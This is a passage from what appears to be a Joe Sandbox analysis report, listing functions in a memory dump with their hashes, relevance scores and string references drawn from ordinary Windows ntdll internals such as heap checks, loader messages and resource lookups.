
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01AA5449
HEAP[%wZ]: , xrefs: 01AA5431
HEAP: , xrefs: 01AA543E

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 33accb48c24834da46bb398a737b2c5a1db91ecde518940433c34a048073c553
Instruction ID: d534de9ef12454e9cccac1ae218c22bca154feb09cc1800d872903431afa7ee4
Opcode Fuzzy Hash: 33accb48c24834da46bb398a737b2c5a1db91ecde518940433c34a048073c553
Instruction Fuzzy Hash: 52110331718102AFDB69CB29C581F7AB3A6EF80715F1A8119F806CF252DB30D840C759

Uniqueness

Uniqueness Score: -1.00%

Function 01AC20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 01AC20FA
minkernel\ntdll\ldrinit.c, xrefs: 01AC2104
Process initialization failed with status 0x%08lx, xrefs: 01AC20F3

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 6064aab8b908f97e42442ff6ba59d0e98c989545e5c5ae725a24965d41e456d3
Instruction ID: caf05746f0802439ac56febb61d2647de1fb1b1ab858c0eb68a4b92675bce492
Opcode Fuzzy Hash: 6064aab8b908f97e42442ff6ba59d0e98c989545e5c5ae725a24965d41e456d3
Instruction Fuzzy Hash: 9FF0C235640358BBE724EB4CCD42F9A3BA8FB81F54F14006EF600BB285D2F0A910C691

Uniqueness

Uniqueness Score: -1.00%

Function 01A503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AA4D8A

Strings

#%u, xrefs: 01AA4D82

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 3ca59563ed7c8c0db1f73232e2a8416f4d6452002edc5b5f52da42b029186443
Instruction ID: a0cfca04190136ede465b0c3aff9ccacbe51374e665b883c2bdb91bdb4eb209c
Opcode Fuzzy Hash: 3ca59563ed7c8c0db1f73232e2a8416f4d6452002edc5b5f52da42b029186443
Instruction Fuzzy Hash: B5714B71A0014A9FDB01DFA8CA90BAEBBF8BF48744F194065F905E7251EB74ED45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A4A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 01A4AA25
LdrResSearchResource Enter, xrefs: 01A4AA13

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: bc1e1feec70a57e2c625ba1c2d5cfc16be3e6e54b8cb2b5df9749386f9711149
Instruction ID: 403381c9092fab0f0a1e6d5e9069fbeae3b04c62b75b4583ece099c0e3af6d6d
Opcode Fuzzy Hash: bc1e1feec70a57e2c625ba1c2d5cfc16be3e6e54b8cb2b5df9749386f9711149
Instruction Fuzzy Hash: 2DE17371E842199FEF22CF99C980BAEBBB9FF88350F54442AE902E7251D774D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01B0A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01B0A44B
`, xrefs: 01B0A551

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 91a640dd7d046fff568fd5c51aac04fc393405fdab63741b09401cad2528c6a7
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 59C18C312043429BEB2ACE28C841B6ABFE5EFD4318F188E6DF6968B2D1D775D505CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01ABE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 01ABE75A
UEFI, xrefs: 01ABE751

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: ed06be368d850994007a40be25ff2960b28246c7e49ff73b648a8ed5d6165d48
Instruction ID: 7068a7b71b6c1c7ff4df84a6900a58b1201caf2c8f57bff413393efb72939876
Opcode Fuzzy Hash: ed06be368d850994007a40be25ff2960b28246c7e49ff73b648a8ed5d6165d48
Instruction Fuzzy Hash: 83615AB1E006599FDB15DFA9C980BEEBBF9FB48700F14806DE649EB252D731A940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01AE43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01AE4525
@, xrefs: 01AE4437

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 20988946f10a39b83659c387c312590ea3180e868ea500339eb439c3a5e54cb2
Instruction ID: 74a7dd22af7d832badeeda87154a6c7abe38885bcc12a16122903e2c400f647a
Opcode Fuzzy Hash: 20988946f10a39b83659c387c312590ea3180e868ea500339eb439c3a5e54cb2
Instruction Fuzzy Hash: 5551F871E0021EAFEB11DFA9CD84AEEBBFDAB48754F10052AE611E7290D6309D05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01A404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01A40540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A4063D

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 27f40a3975634552c5df535337516d5ac3e1d6d2ed7bb0b69c0406def36c5ecd
Instruction ID: 496e303b14d7c65b810d8ad69a2d7d587c34439a8c1bea1fb9433337e3690a3b
Opcode Fuzzy Hash: 27f40a3975634552c5df535337516d5ac3e1d6d2ed7bb0b69c0406def36c5ecd
Instruction Fuzzy Hash: 96518B715047429BD724EF78C6406E7BBE8AFC4304F14883EFAEA87241E7B4A545DB92

Uniqueness

Uniqueness Score: -1.00%

Function 01A4A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 01A4A309
RtlpResUltimateFallbackInfo Enter, xrefs: 01A4A2FB

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: f62f53a390697fd719cd0734bd027bfd3bfc75af13f8d88cb8af345a186c2ffb
Instruction ID: dd2efe13c48207591e27e749b83b5e426aedf751dda033e70ef9424914351daf
Opcode Fuzzy Hash: f62f53a390697fd719cd0734bd027bfd3bfc75af13f8d88cb8af345a186c2ffb
Instruction Fuzzy Hash: 9141C235A44645DFEB21CF69C840B6EBBB4FFC5700F1880AAE906DB291E3B5E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A7A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 01A7A5E9
Cleanup Group, xrefs: 01A7A5E4

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 745897662b9cf127aab072c9b66ebaa714a2003e021fb112f494a0b8a42013e7
Instruction ID: 8a56f25201b877df79ddadf3cd6b487cd8593a2a16fb0866798021a29861e8da
Opcode Fuzzy Hash: 745897662b9cf127aab072c9b66ebaa714a2003e021fb112f494a0b8a42013e7
Instruction Fuzzy Hash: C701D1B2640700BFD311DF14CE45B2A77E8E785715F088939B648C7190E334DA04CB46

Uniqueness

Uniqueness Score: -1.00%

Function 01A4C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 01A4C8C3, 01A4CA40

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 2860b7a3c208af3f5061a22bcb894980682824eb5666c9627825b7da6b8e97ff
Instruction ID: d4d13ea08fbe29c94b9e5a6a0741cddc6446a4188d2a5757e1e15669b87b36e4
Opcode Fuzzy Hash: 2860b7a3c208af3f5061a22bcb894980682824eb5666c9627825b7da6b8e97ff
Instruction Fuzzy Hash: 89828C75E012189FEB25CFA9C980BEDBBB1BF88320F14816AD919AB355D770AD41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01AC6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01AC65C1

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e741c2d6645fe58564e9ab64e61bea43d7a4a59bd61266da84805703664822c6
Instruction ID: fe460089b570a79517f4eb4d38f148cdd4f5705c3b2899f156ae23ee84a333c6
Opcode Fuzzy Hash: e741c2d6645fe58564e9ab64e61bea43d7a4a59bd61266da84805703664822c6
Instruction Fuzzy Hash: 2F9164B1900219AFEB21DF95CD85FAEBBB8EF14B50F100059F605AB291D774ED04CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01AEE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 01AEE1FA

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1f0686840b8ae943b3349ce2effad087239fc3aa418679051a2dfc458aed6920
Instruction ID: eb5f02831fc4b571e4978361403ff09adbcbba83cfe9fd0ab532f25160f65fac
Opcode Fuzzy Hash: 1f0686840b8ae943b3349ce2effad087239fc3aa418679051a2dfc458aed6920
Instruction Fuzzy Hash: 7F91BF7290064ABFDF22AFA4DD48FAFBBB9EF85740F140029F505A7250EB749901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A7A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 01AB67C9

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 8681c760fdac644274cf08e658725d1e61f0b5ed8fb41fe11135791ceebb0b97
Instruction ID: f02fc192e6eb31b10f01eab3a4956b8c9433f5a36f3445d832e1db81953bf8e0
Opcode Fuzzy Hash: 8681c760fdac644274cf08e658725d1e61f0b5ed8fb41fe11135791ceebb0b97
Instruction Fuzzy Hash: EC718EB5E0025ADFDF29CF9CC5906EDBBB6BF58700F18812EE909A7242E7359941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01AE4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01AE4A7F

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: ad31c28c76b25fa8742d3b4d8ea6662c7d212bf275596fced53d9bde85c1e751
Instruction ID: b46bbbab6244cb6eba69694646ec8c172a5d1101c0d5c18181c8a34c39791d42
Opcode Fuzzy Hash: ad31c28c76b25fa8742d3b4d8ea6662c7d212bf275596fced53d9bde85c1e751
Instruction Fuzzy Hash: 355193B2D0022A9BDF10DF99D948AAEBBF9BF58610F054129EA11FB340D7349D01CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 01A5E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 01A5E6A4

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 6b2d02f55d36dfd34a16d881c71756af6fb0f7caa85319f16adcab32ae181281
Instruction ID: 363779ba41b095ba90a80d037f35f7f3c6ebea2b55a1651ae6b578a8cda1f781
Opcode Fuzzy Hash: 6b2d02f55d36dfd34a16d881c71756af6fb0f7caa85319f16adcab32ae181281
Instruction Fuzzy Hash: D2417F7260C352ABD751DB75C940B6BFBE8AF88714F44092DBE84D7140E674DA04C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 01ABC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01ABC77F

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 23d88fbfc48f9da6be17d0f90c43ced7fbfb8b38d47773f7871bc9803e8f4f0b
Instruction ID: 281bce841bc3a258486333e8d5d75314e638daeaecb0bec2bd078feddb271412
Opcode Fuzzy Hash: 23d88fbfc48f9da6be17d0f90c43ced7fbfb8b38d47773f7871bc9803e8f4f0b
Instruction Fuzzy Hash: 634154B1D0016DABDB21DB90CDC4FEEB77CAB54724F0045A5EA08AB145DB709E89CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 01AD6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01AD6B91

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 65ec7e99affd99e2b17d006d2f17694cb9a9ea62d7bb02fd528029e5b47c3ca3
Instruction ID: 1e80f11e8a5ad86a7c5704282c03614c8a92505d483aead5ccfad7508c84fce4
Opcode Fuzzy Hash: 65ec7e99affd99e2b17d006d2f17694cb9a9ea62d7bb02fd528029e5b47c3ca3
Instruction Fuzzy Hash: 98312D31E00B599BEB32DF69C850BFE7BB8EF44704F144028E94AAB282D775E805CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01AC892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01AC895E

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 852fa6fe8efb10a347a2d1384c571c1a6cec03aa7cd8dba2cd0fae120ae29b0e
Instruction ID: fcb1d794e560f3b8da97cf0f00354ddea5bffb242a81e1ac37d60566d783be23
Opcode Fuzzy Hash: 852fa6fe8efb10a347a2d1384c571c1a6cec03aa7cd8dba2cd0fae120ae29b0e
Instruction Fuzzy Hash: 3C012632300201AFE635AB5ACD84ADA7BA5FFC5B55B08002CF642A7161CB24A850C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 01AE2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64061c29314f017b3573a364d4a57b832e63c0c946c70ff56b85fc7f29455dc8
Instruction ID: 906367d8f5fc78e9b4a9303dc5b8018f4900c7b86268cefd4c34d71636545019
Opcode Fuzzy Hash: 64061c29314f017b3573a364d4a57b832e63c0c946c70ff56b85fc7f29455dc8
Instruction Fuzzy Hash: C342C5716083419FE726CF68C994B6BBBE9BF88700F08092EFA8297250D770D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01AD8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f7ce5fcbb3dc3046d249561abb62aa20ff30682d2b3b2cb1059ed7649f51af1
Instruction ID: dcd3464a377642e52928e93ba2b134c4f352db13a6ce4d11173535b03e7f3f42
Opcode Fuzzy Hash: 0f7ce5fcbb3dc3046d249561abb62aa20ff30682d2b3b2cb1059ed7649f51af1
Instruction Fuzzy Hash: 1E425F75E006198FEB25CF69C841BADBBF5BF48310F198099E94DEB242DB389985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01A52840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822c1c6cb6dd36a193816930d0be80e13aebc203d1f82cfccefc1e97e416340a
Instruction ID: 3164dc2617f3b20369b48de957ea23d229aea20d9a84a2cdf0c2c931890fe507
Opcode Fuzzy Hash: 822c1c6cb6dd36a193816930d0be80e13aebc203d1f82cfccefc1e97e416340a
Instruction Fuzzy Hash: EF32DD70A04756CBEB2ACF69C9447BEBBF2BF88304F58411DD58A9B285D735A841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01AEA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1278eebdbb2fa1c75eafbb656c43bcb3648fbe5249bbdbdfe5bd4cbc150d42ed
Instruction ID: c86f5d4169054fb692d97bf8efc3eec669be07a573c3749cc20509ce72903608
Opcode Fuzzy Hash: 1278eebdbb2fa1c75eafbb656c43bcb3648fbe5249bbdbdfe5bd4cbc150d42ed
Instruction Fuzzy Hash: FF22CE742046618FEB25CF2DC098772BBF1AF45340F08849AE997CF286E775E592DB60

Uniqueness

Uniqueness Score: -1.00%

Function 01A64A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 3a8f2ecc7a37acd2dd8387cf94317f93ee478d8a35b36e60574541e4cf40c102
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 2DF15D71E0021ADFDB16CFA9D580BAEBBF9AF48710F488129E905EB344E774D841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01AD892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ade8a5d618e76eee4e9d2a1df399e16838067b51f89e8108c5df9e059782017d
Instruction ID: 3ca9c0ca53d1c7a143e2aae277f2707600753371839ecda1ccd4be109cd46644
Opcode Fuzzy Hash: ade8a5d618e76eee4e9d2a1df399e16838067b51f89e8108c5df9e059782017d
Instruction Fuzzy Hash: D8D1F071A00A0A8BDF15CF69C841BFEB7F1BF88304F198169D956E7281E739E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01A465D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cefc7d0ab73e3f90004d25b0ae33e87ff6008c55f2815f572a81fcd08b33c291
Instruction ID: 7bddea51172eeb182d8b75cb51db9ff9eef92e1c5338a9a358c5af767866a0ab
Opcode Fuzzy Hash: cefc7d0ab73e3f90004d25b0ae33e87ff6008c55f2815f572a81fcd08b33c291
Instruction Fuzzy Hash: 70E17C75508342DFC715CF28C590A6ABBF0BFCA314F058A6DE99987352EB31E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01A38397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b0dd3ba6a357c959de73c5c0981a6a3d0589e67d77c5ecb66568df62e3ed22
Instruction ID: d6e7ee340d648377ae2f06233731c6751ad9eac9c7d657be8451b5b5fb6640a3
Opcode Fuzzy Hash: e2b0dd3ba6a357c959de73c5c0981a6a3d0589e67d77c5ecb66568df62e3ed22
Instruction Fuzzy Hash: 26D1D371A002069BDF15DF69D980FBAB7F5BF94204F04462DFA16DB281E738E950CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01AC8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: b62964023962f8236d77cc8f005cda9bf06c7f15ebf94a7555897f653c5c7536
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 01B1B674A007059FDF24DF98C944EABBBBAFF84704F10441EAA5297795DA38E905CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01A50535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 109f2c7841b31557c616d9fe49b09c8a7a6f97e858081b3bd479872617c3cc0b
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 85B13A716046469FDB61DFA8CA50BBEBBF6AF88300F184569FA42D7281D770DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A483C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888c40670a4c4e1e6b787d7503b184f3563ae1b8bb44b10f628b4966d3cc2be9
Instruction ID: 1a741398e9e5a024dfb7b94eeee99ac54ee2cd36fb87b018a385484e6950236c
Opcode Fuzzy Hash: 888c40670a4c4e1e6b787d7503b184f3563ae1b8bb44b10f628b4966d3cc2be9
Instruction Fuzzy Hash: B8C157746083819FE764CF69C484BABB7F5BF88304F44496DE98987291D778E908CF92

Uniqueness

Uniqueness Score: -1.00%

Function 01A3C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f543932e4165114776f856ca40ae3e67e98bd7c951f71e92e6824c85c9408e76
Instruction ID: a72115a6dada59f646ac116a5861a1d50ac7108a99b924e73df50b855f580efb
Opcode Fuzzy Hash: f543932e4165114776f856ca40ae3e67e98bd7c951f71e92e6824c85c9408e76
Instruction Fuzzy Hash: 2BB17370A002658BDB65DF68CD90BA9B3F5EF84710F1485EAE50AE7285EB30DDC5CB20

Uniqueness

Uniqueness Score: -1.00%

Function 01A6E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b72986585c70b0c1bb25d8ec9eba2ec2a522c7958216086bddd2e95ed6725d67
Instruction ID: d58fc10c2347d64d690f99766a77bd794825931248df673c6a149eb11cd6e48c
Opcode Fuzzy Hash: b72986585c70b0c1bb25d8ec9eba2ec2a522c7958216086bddd2e95ed6725d67
Instruction Fuzzy Hash: 6AA12535E00659AFEF25DFA8C948FAEBBB8AF04714F050125EA11AB2D1D7789D40CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01A80185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

